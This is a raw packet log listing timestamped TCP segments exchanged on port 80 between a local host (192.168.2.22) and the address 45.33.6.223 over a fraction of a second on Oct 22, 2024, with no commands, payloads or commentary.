                                                                          Oct 22, 2024 15:01:39.800327063 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.800345898 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.801290989 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.801307917 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.801321983 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.801337957 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.801348925 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.801367998 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.802289009 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.802303076 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.802313089 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.802325010 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.802350998 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.802364111 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.803164005 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.803179026 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.803189039 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.803210974 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.803221941 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.804035902 CEST804916445.33.6.223192.168.2.22
Oct 22, 2024 15:01:39.804055929 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.804071903 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.804088116 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.804090977 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.804090977 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.804115057 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.804121017 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.805541039 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.821757078 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.821804047 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.821818113 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.821820974 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.821830988 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.821852922 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.822251081 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.822272062 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.822287083 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.822297096 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.822307110 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.822329998 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.823199987 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.823215008 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.823225021 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.823246002 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.823257923 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.824059010 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.824074984 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.824084044 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.824095011 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.824105978 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.824110031 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.824121952 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.824140072 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.824989080 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.824992895 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.825007915 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.825023890 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.825026035 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.825047970 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.825061083 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.898602009 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.898729086 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.898741961 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.898766994 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.898766994 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.898813009 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.899323940 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.899338961 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.899348974 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.899368048 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.899368048 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.899385929 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.900232077 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.900249958 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.900265932 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.900280952 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.900280952 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.900298119 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.900748968 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.900964975 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.900983095 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.901002884 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.901011944 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.901021957 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.901038885 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.901932001 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.901947975 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.901958942 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.901972055 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.901972055 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.901979923 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.901999950 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.902005911 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.902827024 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.902842045 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.902853012 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.902865887 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.902879953 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.902895927 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.903776884 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.903798103 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.903812885 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.903820992 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.903827906 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.903831959 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.903848886 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.903856993 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.904349089 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.904681921 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.904696941 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.904709101 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.904725075 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.904737949 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.905656099 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.905673981 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.905685902 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.905695915 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.905709028 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.905715942 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.906555891 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.906590939 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.906595945 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.906606913 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.906624079 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.906625986 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.906641960 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.906653881 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.907746077 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.907761097 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.907772064 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.907783985 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.907795906 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.907804966 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.908027887 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.908045053 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.908058882 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.908067942 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.908077002 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.908088923 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.908627033 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.908849001 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.908865929 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.908876896 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.908890009 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.908898115 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.908926964 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.908926964 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.909512043 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.909528971 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.909540892 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.909554005 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.909567118 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.909573078 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.910254955 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.910269976 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.910280943 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.910296917 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.910310030 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.910984039 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.910999060 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.911010027 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.911024094 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.911031008 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.911042929 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.911062002 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.911739111 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.911752939 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.911763906 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.911780119 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.911792040 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.912281036 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.912318945 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.912502050 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.912646055 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.912658930 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.912672997 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.912688017 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.912692070 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.912700891 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.912718058 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.913623095 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.913636923 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.913649082 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.913676023 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.913686991 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.913701057 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.914587021 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.914606094 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.914618969 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.914633036 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.914633036 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.914645910 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.915431976 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.915461063 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.915471077 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.915472984 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.915484905 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.915497065 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.915507078 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.915524960 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.916317940 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.916333914 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.916343927 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.916361094 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.916424990 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.916569948 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.917144060 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.917159081 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.917170048 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.917181969 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.917188883 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.917197943 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.917217016 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.918004990 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.918019056 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.918030024 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.918045998 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.918059111 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.918874025 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.918889999 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.918904066 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.918917894 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.918927908 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.918927908 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.918941021 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.918962002 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.919831991 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.919847965 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.919858932 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.919872046 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.919873953 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.919879913 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.919905901 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.920249939 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.920497894 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.920515060 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.920542002 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.920546055 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.920562029 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.920568943 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.921272993 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.921289921 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.921302080 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.921313047 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.921314001 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.921319962 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.921334028 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.921343088 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.922074080 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.922101974 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.922111988 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.922113895 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.922137022 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.922144890 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.922914982 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.922939062 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.922950029 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.922960997 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.922971010 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.922986984 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.923662901 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.923685074 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.923707008 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.923712015 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.923713923 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.923729897 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.923746109 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.923753977 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.923988104 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.924487114 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.924503088 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.924520016 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.924530029 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.924541950 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.924567938 CEST  49164  80  192.168.2.22  45.33.6.223
Oct 22, 2024 15:01:39.925256968 CEST  80  49164  45.33.6.223  192.168.2.22
Oct 22, 2024 15:01:39.925278902 CEST  80  49164  45.33.6.223  192.168.2.22
                                                                          Oct 22, 2024 15:01:39.925292969 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.925296068 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.925306082 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.925308943 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.925327063 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.925333023 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.926060915 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.926075935 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.926088095 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.926100969 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.926114082 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.926120996 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.926840067 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.926856041 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.926866055 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.926878929 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.926883936 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.926883936 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.926906109 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.926913023 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.927640915 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.927658081 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.927669048 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.927680016 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.927692890 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.927706003 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.927756071 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.928631067 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.928680897 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.928684950 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.928718090 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.928725004 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.928812981 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.928817987 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.928845882 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.929236889 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.929255962 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.929271936 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.929275990 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.929282904 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.929302931 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.930027008 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.930042982 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.930058002 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.930068016 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.930075884 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.930075884 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.930090904 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.930100918 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.930793047 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.930810928 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.930826902 CEST804916445.33.6.223192.168.2.22
                                                                          Oct 22, 2024 15:01:39.930834055 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.930841923 CEST4916480192.168.2.2245.33.6.223
                                                                          Oct 22, 2024 15:01:39.930844069 CEST804916445.33.6.223192.168.2.22
